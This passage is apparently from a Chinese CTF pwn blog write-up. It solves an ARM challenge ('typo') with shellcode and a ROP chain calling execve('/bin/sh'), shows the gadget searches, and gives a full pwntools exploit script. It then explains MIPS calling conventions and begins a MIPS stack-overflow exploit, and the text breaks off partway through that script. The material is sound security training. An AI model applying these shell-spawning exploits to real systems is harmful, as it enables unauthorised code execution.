<span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>ru(<span class="hljs-string">"Input ~ if you want to quit"</span>)<br>s(<span class="hljs-string">b'\n'</span>)<br><br>sleep(<span class="hljs-number">0.5</span>)<br>io.recv()<br>payload=asm(shellcraft.sh()).ljust(<span class="hljs-number">112</span>,<span class="hljs-string">b'A'</span>)+p32(<span class="hljs-number">0xfffeef44</span>)<span class="hljs-comment">#shellcode</span><br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure><h3 id="2-rop"><a href="#2-rop" class="headerlink" title="2.rop"></a>2.rop</h3><p><code>svc:r7=0xb;R0=addr(“/bin/sh”);R1=0;R2=0</code><br>以上系统调用等同于execve(“/bin/sh”,0,0)</p><p>svc: 通过这条指令切换到 svc 模式(svc 替代了以前的 swi 指令,是 ARM 提供的系统调用指令),进入到软件中断处理函数( SWI handler )。</p><p>所以我们RoP目标状态如下:</p><ul><li>R0 = “/bin/sh”</li><li>R1 = 0</li><li>R2 = 0</li><li>R7 = 0xb (对应arm下execve的系统调用)</li><li>svc</li></ul><p>1./bin/sh的地址可以通过ida直接找到:0x006C384</p><p>2.rop</p><blockquote><p>在这里 pc 相当于x86的ret,构成gadget。</p></blockquote><figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-number">0x00020904</span> : <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r0</span>, <span class="hljs-built_in">r4</span>, <span class="hljs-built_in">pc</span>} <br><span class="hljs-number">0x00068bec</span> : <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r1</span>, <span class="hljs-built_in">pc</span>} <br><span class="hljs-number">0x00014068</span> : <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r7</span>, <span class="hljs-built_in">pc</span>} <br></code></pre></td></tr></table></figure><p>没有r2寄存器gadget,需要通过mov方式赋值,我们这有r4的,找个 <code>mov r2 , r4</code>。再通过blx r3跳转回去</p><figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs armasm">(typo/ELF/<span class="hljs-meta">ARM</span>)> search <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r2</span>, <span class="hljs-built_in">r4</span><br>[<span class="hljs-meta">INFO</span>] Searching for gadgets: <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r2</span>, <span class="hljs-built_in">r4</span><br><br>[<span class="hljs-meta">INFO</span>] File: typo<br><span class="hljs-number">0x0003338c</span>: <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r2</span>, <span class="hljs-built_in">r4</span><span class="hljs-comment">; blx r3;</span><br></code></pre></td></tr></table></figure><p>于是还需要找能够控制r3寄存器的gadget</p><figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs armasm">(typo/ELF/<span class="hljs-meta">ARM</span>)> search <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r3</span><br>[<span class="hljs-meta">INFO</span>] Searching for gadgets: <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r3</span><br><br>[<span class="hljs-meta">INFO</span>] File: typo<br><span class="hljs-number">0x00053d10</span>: <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r3</span>, <span class="hljs-built_in">lr</span>}<span class="hljs-comment">; bx r3; </span><br><span class="hljs-number">0x00008160</span>: <span class="hljs-keyword">pop</span> {<span class="hljs-built_in">r3</span>, <span class="hljs-built_in">pc</span>}<span class="hljs-comment">; #选择这个</span><br></code></pre></td></tr></table></figure><p>最后找svc的gadget</p><figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs clean">(typo/ELF/ARM)> search svc<br>[INFO] Searching for gadgets: svc<br><br>[INFO] File: typo<br><span class="hljs-number">0x00023b78</span>: svc #<span class="hljs-number">0</span>; b #<span class="hljs-number">0x1ba94</span>; ldr r3, [pc, #<span class="hljs-number">0xa8</span>]; ldr r0, [r3, #<span class="hljs-number">4</span>]; sub sp, fp, #<span class="hljs-number">0x20</span>; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x00021538</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x19598</span>; mov r0, r3; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x0002165c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x19674</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x000220c0</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x1a0d8</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00024210</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x1c254</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x0003147c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x294b0</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00047a54</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x3fa88</span>; mov r0, r3; pop {r3, r4, r7, pc}; <br><span class="hljs-number">0x00048354</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x4036c</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x0004839c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x403b4</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00048454</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x4046c</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x0004858c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x405a4</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x0005e200</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x56218</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00014054</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0xc06c</span>; mov r0, r3; pop {r7, pc}; <br><span class="hljs-number">0x00014a5c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0xca74</span>; mov r0, r3; pop {r3, r4, r7, pc}; <br><span class="hljs-number">0x00024014</span>: svc #<span class="hljs-number">0</span>; ldr r7, [r6, #<span class="hljs-number">-0x43c</span>]; and r3, r7, #<span class="hljs-number">0xc</span>; cmp r3, #<span class="hljs-number">4</span>; beq #<span class="hljs-number">0x1c000</span>; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x0003226c</span>: svc #<span class="hljs-number">0</span>; mov r0, #<span class="hljs-number">0</span>; pop {r3, r4, r5, r6, r7, pc}; <br><span class="hljs-number">0x0001edf0</span>: svc #<span class="hljs-number">0</span>; mov r0, #<span class="hljs-number">0</span>; pop {r3, r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x00030bd8</span>: svc #<span class="hljs-number">0</span>; mov r0, #<span class="hljs-number">0</span>; sub sp, fp, #<span class="hljs-number">0x20</span>; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x0000ddc0</span>: svc #<span class="hljs-number">0</span>; mov r0, r6; add sp, sp, #<span class="hljs-number">0xc</span>; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x0003b4bc</span>: svc #<span class="hljs-number">0</span>; mov r0, r6; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x00039f60</span>: svc #<span class="hljs-number">0</span>; mov r0, r8; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x0000fed0</span>: svc #<span class="hljs-number">0</span>; pop {r3, r4, r5, r6, r7, pc}; <br><span class="hljs-number">0x00016368</span>: svc #<span class="hljs-number">0</span>; pop {r4, r5, r6, r7, pc}; <br><span class="hljs-number">0x0001aca8</span>: svc #<span class="hljs-number">0</span>; pop {r4, r5, r6, r7, r8, pc}; <br><span class="hljs-number">0x00019568</span>: svc #<span class="hljs-number">0</span>; pop {r4, r5, r6, r7, r8, sb, pc}; <br><span class="hljs-number">0x000482fc</span>: svc #<span class="hljs-number">0</span>; pop {r7}; bx lr; <br><span class="hljs-number">0x000505c0</span>: svc #<span class="hljs-number">0</span>; sub sp, fp, #<span class="hljs-number">0x20</span>; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}; <br><span class="hljs-number">0x00008150</span>: svceq #<span class="hljs-number">0x89832c</span>; orrvs sp, lr, #<span class="hljs-number">140</span>, #<span class="hljs-number">6</span>; push {r3, lr}; bl #<span class="hljs-number">0xbd4</span>; pop {r3, pc}; <br></code></pre></td></tr></table></figure><p>至此所需要的gadget全部找到,就可以直接写rop了</p><p>exp:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br><span class="hljs-comment">#banary = "./pwn"</span><br><span class="hljs-comment">#elf = ELF(banary)</span><br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process([<span class="hljs-string">"qemu-arm-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/arm-linux-gnueabi"</span>,<span class="hljs-string">"./typo"</span>])<br><span class="hljs-keyword">else</span>:<br> io = process([<span class="hljs-string">"qemu-arm-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/arm-linux-gnueabi"</span>,<span class="hljs-string">"-g"</span>,<span class="hljs-string">"1234"</span>,<span class="hljs-string">"./typo"</span>])<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'arm'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>ru(<span class="hljs-string">"Input ~ if you want to quit"</span>)<br>s(b<span class="hljs-string">'\n'</span>)<br><br>sleep(0.5)<br>io.recv()<br><span class="hljs-comment">#payload=asm(shellcraft.sh()).ljust(112,b'A')+p32(0xfffeef44)#shellcode</span><br><span class="hljs-attribute">pop_r0_r4_pc</span>=0x00020904<br><span class="hljs-attribute">bin_sh</span>=0x006C384<br><span class="hljs-attribute">svc_0</span>=0x00023b78<br><span class="hljs-attribute">pop_r7_pc</span>=0x00014068<br><span class="hljs-attribute">pop_r1_pc</span>=0x00068bec<br><span class="hljs-attribute">mov_r2_r4_blx_r3</span>=0x0003338c<br><span class="hljs-attribute">pop_r3_pc</span>=0x00008160<br><br><span class="hljs-attribute">payload</span>=b'A'*112+p32(pop_r7_pc)+p32(0xb)+p32(pop_r1_pc)+p32(0)+p32(pop_r0_r4_pc)+p32(bin_sh)+p32(0)+p32(pop_r3_pc)+p32(svc_0)+p32(mov_r2_r4_blx_r3)<br><span class="hljs-comment">#pause()</span><br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure><h1 id="mips架构"><a href="#mips架构" class="headerlink" title="mips架构"></a>mips架构</h1><h2 id="基础知识-1"><a href="#基础知识-1" class="headerlink" title="基础知识"></a>基础知识</h2><h3 id="MIPS-重要特性"><a href="#MIPS-重要特性" class="headerlink" title="MIPS 重要特性"></a>MIPS 重要特性</h3><ul><li>mips本身不支持NX</li></ul><h3 id="MIPS-函数调用约定"><a href="#MIPS-函数调用约定" class="headerlink" title="MIPS 函数调用约定"></a>MIPS 函数调用约定</h3><ul><li>调用者将参数保存在寄存器 $a0 - $a3 中。其总共能保存4个参数。如果有更多的参数,或者有传值的结构,其将被保存在栈中。</li><li>调用者使用 jal 加上子程序的标记。返回地址保存在 $ra 中。</li><li>返回地址是 PC + 4,PC 是 jal 指令的地址。</li><li>如果被调用者使用框架指针,它通常将其设置为栈指针。旧的栈指针必须在之前被保存到栈中。</li><li>被调用者通常在开头将其需要使用的寄存器保存到栈中。如果被调用者调用了辅助子程序,必须将 $ra入栈,同时也必须将临时寄存器或被保留的寄存器入栈。</li><li>当子程序结束,返回值要保存在 $v0 - $v1 中。</li><li>被调用者使用 jr $ra 返回到调用者那里。</li></ul><p>Ref:<a href="https://www.jianshu.com/p/79895392ecb2">https://www.jianshu.com/p/79895392ecb2</a></p><h3 id="MIPS-寄存器"><a href="#MIPS-寄存器" class="headerlink" title="MIPS 寄存器"></a>MIPS 寄存器</h3><table><thead><tr><th>寄存器编号</th><th>别名</th><th>用途</th></tr></thead><tbody><tr><td>$0</td><td>$zero</td><td>常量0(constant value 0)</td></tr><tr><td>$1</td><td>$at</td><td>保留给汇编器(Reserved for assembler)</td></tr><tr><td>$2-$3</td><td>$v0-$v1</td><td>函数调用返回值(values for results and expression evaluation)</td></tr><tr><td>$4-$7</td><td>$a0-$a3</td><td>函数调用参数(arguments)</td></tr><tr><td>$8-$15</td><td>$t0-$t7</td><td>暂时的(或随便用的)</td></tr><tr><td>$16-$23</td><td>$s0-$s7</td><td>保存的(或如果用,需要SAVE/RESTORE的)(saved)</td></tr><tr><td>$24-$25</td><td>$t8-$t9</td><td>暂时的(或随便用的)</td></tr><tr><td>$28</td><td>$gp</td><td>全局指针(Global Pointer)</td></tr><tr><td>$29</td><td>$sp</td><td>堆栈指针(Stack Pointer)</td></tr><tr><td>$30</td><td>$fp/$s8</td><td>栈帧指针(Frame Pointer)</td></tr><tr><td>$31</td><td>$ra</td><td>返回地址(return address)</td></tr></tbody></table><p>基础知识:<a href="https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#mips">https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#mips</a></p><h2 id="前期准备"><a href="#前期准备" class="headerlink" title="前期准备"></a>前期准备</h2><p>ida的mipsrop插件:<a href="https://github.com/tacnetsol/ida">https://github.com/tacnetsol/ida</a></p><p>用ropper或者ROPgadget都不太好找gadget?</p><h2 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h2><h3 id="HWS夏令营结营赛题-pwn"><a href="#HWS夏令营结营赛题-pwn" class="headerlink" title="HWS夏令营结营赛题:pwn"></a>HWS夏令营结营赛题:<a href="https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_mips_stack/mips_pwn_1/pwn">pwn</a></h3><p>运行:</p><figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs actionscript">qemu-mips-<span class="hljs-keyword">static</span> ./pwn<br></code></pre></td></tr></table></figure><p>调试:</p><figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs actionscript">qemu-mips-<span class="hljs-keyword">static</span> -g <span class="hljs-number">1234</span> ./pwn<br></code></pre></td></tr></table></figure><p>保护措施</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161756671.png" alt="image-20240316175622583"></p><p>分析题目代码有个很明显的memcpy造成的栈溢出</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161757594.png" alt="image-20240316175735552"></p><p>只是格式有点要求,直接调试不能直接获得偏移,会在下面这个地方卡住,具体原因就不太懂了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161800428.png" alt="image-20240316180028333"></p><p>只能通过去找输入的地址以及最后给到ra寄存器值的地址然后计算出偏移</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161803215.png" alt="image-20240316180341152"></p><p>找到偏移之后就是利用mipsrop去找需要的gadget</p><p>思路大概是,找一个能将栈上的地址放进寄存器的gadget,再找一个对应的gadget可以jalr或者jr这个寄存器过去执行shellcode</p><figure class="highlight gherkin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs gherkin">Python>mipsrop.stackfinder()<br>----------------------------------------------------------------------------------------------------------------<br>|<span class="hljs-string"> Address </span>|<span class="hljs-string"> Action </span>|<span class="hljs-string"> Control Jump </span>|<br>----------------------------------------------------------------------------------------------------------------<br>|<span class="hljs-string"> 0x004273C4 </span>|<span class="hljs-string"> addiu $a2,$sp,0x70+var_C </span>|<span class="hljs-string"> jalr $s0 </span>|<br>|<span class="hljs-string"> 0x0042BCD0 </span>|<span class="hljs-string"> addiu $a2,$sp,0x88+var_C </span>|<span class="hljs-string"> jalr $s2 </span>|<br>|<span class="hljs-string"> 0x0042FA00 </span>|<span class="hljs-string"> addiu $v1,$sp,0x138+var_104 </span>|<span class="hljs-string"> jalr $s1 </span>|<br>|<span class="hljs-string"> 0x004491F8 </span>|<span class="hljs-string"> addiu $a2,$sp,0x44+var_C </span>|<span class="hljs-string"> jalr $s1 </span>|<br>|<span class="hljs-string"> 0x0044931C </span>|<span class="hljs-string"> addiu $v0,$sp,0x30+var_8 </span>|<span class="hljs-string"> jalr $s1 </span>|<br>|<span class="hljs-string"> 0x00449444 </span>|<span class="hljs-string"> addiu $a2,$sp,0x44+var_C </span>|<span class="hljs-string"> jalr $s1 </span>|<br>|<span class="hljs-string"> 0x0044AD58 </span>|<span class="hljs-string"> addiu $a1,$sp,0x60+var_28 </span>|<span class="hljs-string"> jalr $s4 </span>|<br>|<span class="hljs-string"> 0x0044AEFC </span>|<span class="hljs-string"> addiu $a1,$sp,0x64+var_28 </span>|<span class="hljs-string"> jalr $s5 </span>|<br>|<span class="hljs-string"> 0x0044B154 </span>|<span class="hljs-string"> addiu $a1,$sp,0x6C+var_38 </span>|<span class="hljs-string"> jalr $s2 </span>|<br>|<span class="hljs-string"> 0x0044B1EC </span>|<span class="hljs-string"> addiu $v0,$sp,0x6C+var_40 </span>|<span class="hljs-string"> jalr $s2 </span>|<br>|<span class="hljs-string"> 0x0044B3EC </span>|<span class="hljs-string"> addiu $v0,$sp,0x170+var_130 </span>|<span class="hljs-string"> jalr $s0 </span>|<br>|<span class="hljs-string"> 0x00454E94 </span>|<span class="hljs-string"> addiu $s7,$sp,0xB8+var_98 </span>|<span class="hljs-string"> jalr $s3 </span>|<br>|<span class="hljs-string"> 0x00465BEC </span>|<span class="hljs-string"> addiu $a1,$sp,0xC4+var_98 </span>|<span class="hljs-string"> jalr $s0 </span>|<br>----------------------------------------------------------------------------------------------------------------<br></code></pre></td></tr></table></figure><p>首先找到这个0x004273C4这个gadget,可以将栈地址给到a2寄存器,然后去找能够jalr或者jr a2的gadget</p><figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-section">Python>mipsrop.find("jr")</span><br><span class="hljs-section">----------------------------------------------------------------------------------------------------------------</span><br><span class="hljs-section">| Address | Action | Control Jump |</span><br><span class="hljs-section">----------------------------------------------------------------------------------------------------------------</span><br>| 0x004002FC | jr $ra | jr 0x1C+var_s0($sp) |<br>| 0x0041F518 | jr $t9 | jr $s1 |<br>| 0x0041F538 | jr $t9 | jr $s1 |<br>| 0x00421684 | jr $t9 | jr $a2 |<br><br><span class="hljs-title">.text:00421684 00 C0 C8 25 move $t9, $a2</span><br><span class="hljs-title">.text:00421688 03 20 00 08 jr $t9</span><br></code></pre></td></tr></table></figure><p>很明显可以利用0x00421684这段gadget</p><p>然后就是想办法怎么执行第一段gadget1后接着执行gadget2,先看看这两端gadget</p><figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs arcade"><span class="hljs-number">0x004273C4</span> | addiu <span class="hljs-symbol">$a</span>2,<span class="hljs-symbol">$sp</span>,<span class="hljs-number">0x70</span>+var_C | jalr <span class="hljs-symbol">$s</span>0 <br><span class="hljs-number">0x00421684</span> | jr <span class="hljs-symbol">$t</span>9 | jr <span class="hljs-symbol">$a</span>2 <br><br></code></pre></td></tr></table></figure><p>可以看到第一段gadget最后会jalr到$s0这个寄存器,而在pwn函数的最后刚好可以控制这个寄存器</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161809594.png" alt="image-20240316180902557"></p><p>经过调试确定偏移为0x6c,然后就是在程序最后sp+0x64的地方写上shellcode就可以getshell了</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><span class="hljs-comment">#banary = "./pwn"</span><br><span class="hljs-comment">#elf = ELF(banary)</span><br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process([<span class="hljs-string">"qemu-mips-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/mipsel-linux-gnu/"</span>,<span class="hljs-string">"./pwn"</span>])<br><span class="hljs-keyword">else</span>:<br> io = process([<span class="hljs-string">"qemu-mips-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/mipsel-linux-gnu/"</span>,<span class="hljs-string">"-g"</span>,<span class="hljs-string">"1234"</span>,<span class="hljs-string">"./pwn"</span>])<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'mips'</span>,endian=<span class="hljs-string">"big"</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : 